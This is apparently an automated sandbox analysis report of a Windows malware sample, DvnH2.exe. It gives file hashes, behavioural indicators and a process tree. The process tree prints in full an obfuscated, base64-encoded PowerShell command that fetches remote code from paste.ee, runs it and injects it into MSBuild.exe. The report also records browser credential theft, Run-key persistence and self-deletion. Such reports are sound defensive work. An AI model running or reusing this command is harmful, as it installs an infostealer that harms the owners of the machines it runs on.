Analysis
-
max time kernel
148s -
max time network
149s -
platform
windows7_x64 -
resource
win7 -
submitted
09-07-2020 13:48
Static task
static1
Behavioral task
behavioral1
Sample
DvnH2.exe
Resource
win7
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
DvnH2.exe
Resource
win10v200430
windows10_x64
0 signatures
0 seconds
General
-
Target
DvnH2.exe
-
Size
847KB
-
MD5
bc23e4cf90c63d9a84eb905e6ec82f82
-
SHA1
b82df977fcc19b730ac2cdacec7d3b93617c57ed
-
SHA256
0396da4728728701d82bea35844941b36b6ff001bd4a46b3e3f45d5143205b16
-
SHA512
01007caceb1e777b55d3118f7cb21117f2ca17b4caf211108b90de705c490c472df859da2802d015329b856d1be303bff6f73a624cb720682cea3f1cd0dcddd4
Malware Config
Signatures
-
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
powershell.exepowershell.exeMSBuild.exesystray.exeExplorer.EXEdescription pid process Token: SeDebugPrivilege 1424 powershell.exe Token: SeDebugPrivilege 792 powershell.exe Token: SeDebugPrivilege 1532 MSBuild.exe Token: SeDebugPrivilege 1720 systray.exe Token: SeShutdownPrivilege 1296 Explorer.EXE -
Suspicious behavior: EnumeratesProcesses 31 IoCs
Processes:
powershell.exepowershell.exeMSBuild.exesystray.exepid process 1424 powershell.exe 1424 powershell.exe 792 powershell.exe 792 powershell.exe 1532 MSBuild.exe 1532 MSBuild.exe 1720 systray.exe 1720 systray.exe 1720 systray.exe 1720 systray.exe 1720 systray.exe 1720 systray.exe 1720 systray.exe 1720 systray.exe 1720 systray.exe 1720 systray.exe 1720 systray.exe 1720 systray.exe 1720 systray.exe 1720 systray.exe 1720 systray.exe 1720 systray.exe 1720 systray.exe 1720 systray.exe 1720 systray.exe 1720 systray.exe 1720 systray.exe 1720 systray.exe 1720 systray.exe 1720 systray.exe 1720 systray.exe -
Blacklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 5 792 powershell.exe 6 792 powershell.exe -
Drops file in Program Files directory 1 IoCs
Processes:
systray.exedescription ioc process File opened for modification C:\Program Files (x86)\Dnnupd\gdiedg4.exe systray.exe -
Suspicious use of WriteProcessMemory 28 IoCs
Processes:
DvnH2.exepowershell.exepowershell.exeExplorer.EXEsystray.exedescription pid process target process PID 316 wrote to memory of 1424 316 DvnH2.exe powershell.exe PID 316 wrote to memory of 1424 316 DvnH2.exe powershell.exe PID 316 wrote to memory of 1424 316 DvnH2.exe powershell.exe PID 316 wrote to memory of 1424 316 DvnH2.exe powershell.exe PID 1424 wrote to memory of 792 1424 powershell.exe powershell.exe PID 1424 wrote to memory of 792 1424 powershell.exe powershell.exe PID 1424 wrote to memory of 792 1424 powershell.exe powershell.exe PID 1424 wrote to memory of 792 1424 powershell.exe powershell.exe PID 792 wrote to memory of 1532 792 powershell.exe MSBuild.exe PID 792 wrote to memory of 1532 792 powershell.exe MSBuild.exe PID 792 wrote to memory of 1532 792 powershell.exe MSBuild.exe PID 792 wrote to memory of 1532 792 powershell.exe MSBuild.exe PID 792 wrote to memory of 1532 792 powershell.exe MSBuild.exe PID 792 wrote to memory of 1532 792 powershell.exe MSBuild.exe PID 792 wrote to memory of 1532 792 powershell.exe MSBuild.exe PID 1296 wrote to memory of 1720 1296 Explorer.EXE systray.exe PID 1296 wrote to memory of 1720 1296 Explorer.EXE systray.exe PID 1296 wrote to memory of 1720 1296 Explorer.EXE systray.exe PID 1296 wrote to memory of 1720 1296 Explorer.EXE systray.exe PID 1720 wrote to memory of 1852 1720 systray.exe cmd.exe PID 1720 wrote to memory of 1852 1720 systray.exe cmd.exe PID 1720 wrote to memory of 1852 1720 systray.exe cmd.exe PID 1720 wrote to memory of 1852 1720 systray.exe cmd.exe PID 1720 wrote to memory of 1012 1720 systray.exe Firefox.exe PID 1720 wrote to memory of 1012 1720 systray.exe Firefox.exe PID 1720 wrote to memory of 1012 1720 systray.exe Firefox.exe PID 1720 wrote to memory of 1012 1720 systray.exe Firefox.exe PID 1720 wrote to memory of 1012 1720 systray.exe Firefox.exe -
Adds Run entry to policy start application 2 TTPs 2 IoCs
Processes:
systray.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run systray.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\LPXXV = "C:\\Program Files (x86)\\Dnnupd\\gdiedg4.exe" systray.exe -
Processes:
systray.exedescription ioc process Key created \Registry\User\S-1-5-21-1131729243-447456001-3632642222-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2 systray.exe -
Suspicious use of SetThreadContext 3 IoCs
Processes:
powershell.exeMSBuild.exesystray.exedescription pid process target process PID 792 set thread context of 1532 792 powershell.exe MSBuild.exe PID 1532 set thread context of 1296 1532 MSBuild.exe Explorer.EXE PID 1720 set thread context of 1296 1720 systray.exe Explorer.EXE -
Suspicious behavior: MapViewOfSection 7 IoCs
Processes:
MSBuild.exesystray.exepid process 1532 MSBuild.exe 1532 MSBuild.exe 1532 MSBuild.exe 1720 systray.exe 1720 systray.exe 1720 systray.exe 1720 systray.exe -
Suspicious use of SendNotifyMessage 4 IoCs
Processes:
Explorer.EXEpid process 1296 Explorer.EXE 1296 Explorer.EXE 1296 Explorer.EXE 1296 Explorer.EXE -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
System policy modification 1 TTPs 1 IoCs
Processes:
systray.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer systray.exe -
Suspicious use of FindShellTrayWindow 5 IoCs
Processes:
Explorer.EXEpid process 1296 Explorer.EXE 1296 Explorer.EXE 1296 Explorer.EXE 1296 Explorer.EXE 1296 Explorer.EXE -
Drops file in System32 directory 2 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Processes:
Explorer.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Explorer.EXE
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- Suspicious use of SendNotifyMessage
- Suspicious use of FindShellTrayWindow
- Checks whether UAC is enabled
PID:1296 -
C:\Users\Admin\AppData\Local\Temp\DvnH2.exe"C:\Users\Admin\AppData\Local\Temp\DvnH2.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:316 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe PowERsHELl.`ExE -ExecutionPolicy bypass -w 1 /e JAByAGUAZwAgAD0AIAAoACcAewAyAH0AewAwAH0AewAxAH0AewAzAH0AJwAtAGYAJwBkAFMAdAAnACwAJwByAGkAbgAnACwAHCBgAEQAYABvAGAAdwBuAGAAbABgAG8AYQAdICwAJwBnACcAKQA7AFsAdgBvAGkAZABdACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZABXAGkAdABoAFAAYQByAHQAaQBhAGwATgBhAG0AZQAoACcATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMAJwApADsAJABmAGoAPQBbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4ASQBuAHQAZQByAGEAYwB0AGkAbwBuAF0AOgA6AEMAYQBsAGwAQgB5AG4AYQBtAGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALAAkAHIAZQBnACwAWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEMAYQBsAGwAVAB5AHAAZQBdADoAOgBNAGUAdABoAG8AZAAsACcAaAB0AHQAJwArAFsAQwBoAGEAcgBdADgAMAArACcAJwAgACsAIABbAEMAaABhAHIAXQA1ADgAIAArACAAJwAvAC8AcABhAHMAdABlAC4AZQBlAC8AcgAvAHcAagBtAFgAcQAnACkALgBSAGUAcABsAGEAYwBlACgAIgBeACIALAAgACIANAA0ACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiACoAIgAsACAAIgA0ADgAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAIwAiACwAIAAiADcAOAAiACkAfABJAEUAWAA7AFsAQgB5AHQAZQBbAF0AXQAkAGYAPQBbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4ASQBuAHQAZQByAGEAYwB0AGkAbwBuAF0AOgA6AEMAYQBsAGwAQgB5AG4AYQBtAGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALAAkAHIAZQBnACwAWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEMAYQBsAGwAVAB5AHAAZQBdADoAOgBNAGUAdABoAG8AZAAsACcAaAB0AHQAJwArAFsAQwBoAGEAcgBdADgAMAArACcAcwAnACAAKwAgAFsAQwBoAGEAcgBdADUAOAAgACsAIAAnAC8ALwBwAGEAcwB0AGUALgBlAGUALwByAC8ATwB1AHcASgBaACcAKQAuAHIAZQBwAGwAYQBjAGUAKAAnACQAJAAnACwAJwAwAHgAJwApAHwASQBFAFgAOwBbAEMALgBNAF0AOgA6AFIAKAAnAE0AUwBCAHUAaQBsAGQALgBlAHgAZQAnACwAJABmACkA3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
- Drops file in System32 directory
PID:1424 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -w 1 /e JAByAGUAZwAgAD0AIAAoACcAewAyAH0AewAwAH0AewAxAH0AewAzAH0AJwAtAGYAJwBkAFMAdAAnACwAJwByAGkAbgAnACwAHCBgAEQAYABvAGAAdwBuAGAAbABgAG8AYQAdICwAJwBnACcAKQA7AFsAdgBvAGkAZABdACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZABXAGkAdABoAFAAYQByAHQAaQBhAGwATgBhAG0AZQAoACcATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMAJwApADsAJABmAGoAPQBbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4ASQBuAHQAZQByAGEAYwB0AGkAbwBuAF0AOgA6AEMAYQBsAGwAQgB5AG4AYQBtAGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALAAkAHIAZQBnACwAWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEMAYQBsAGwAVAB5AHAAZQBdADoAOgBNAGUAdABoAG8AZAAsACcAaAB0AHQAJwArAFsAQwBoAGEAcgBdADgAMAArACcAJwAgACsAIABbAEMAaABhAHIAXQA1ADgAIAArACAAJwAvAC8AcABhAHMAdABlAC4AZQBlAC8AcgAvAHcAagBtAFgAcQAnACkALgBSAGUAcABsAGEAYwBlACgAIgBeACIALAAgACIANAA0ACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiACoAIgAsACAAIgA0ADgAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAIwAiACwAIAAiADcAOAAiACkAfABJAEUAWAA7AFsAQgB5AHQAZQBbAF0AXQAkAGYAPQBbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4ASQBuAHQAZQByAGEAYwB0AGkAbwBuAF0AOgA6AEMAYQBsAGwAQgB5AG4AYQBtAGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALAAkAHIAZQBnACwAWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEMAYQBsAGwAVAB5AHAAZQBdADoAOgBNAGUAdABoAG8AZAAsACcAaAB0AHQAJwArAFsAQwBoAGEAcgBdADgAMAArACcAcwAnACAAKwAgAFsAQwBoAGEAcgBdADUAOAAgACsAIAAnAC8ALwBwAGEAcwB0AGUALgBlAGUALwByAC8ATwB1AHcASgBaACcAKQAuAHIAZQBwAGwAYQBjAGUAKAAnACQAJAAnACwAJwAwAHgAJwApAHwASQBFAFgAOwBbAEMALgBNAF0AOgA6AFIAKAAnAE0AUwBCAHUAaQBsAGQALgBlAHgAZQAnACwAJABmACkA4⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
- Suspicious use of WriteProcessMemory
- Suspicious use of SetThreadContext
- Drops file in System32 directory
PID:792 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"5⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
PID:1532 -
C:\Windows\SysWOW64\systray.exe"C:\Windows\SysWOW64\systray.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
- Adds Run entry to policy start application
- Modifies Internet Explorer settings
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- System policy modification
PID:1720 -
C:\Windows\SysWOW64\cmd.exe/c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"3⤵PID:1852
-
C:\Program Files\Mozilla Firefox\Firefox.exe"C:\Program Files\Mozilla Firefox\Firefox.exe"3⤵PID:1012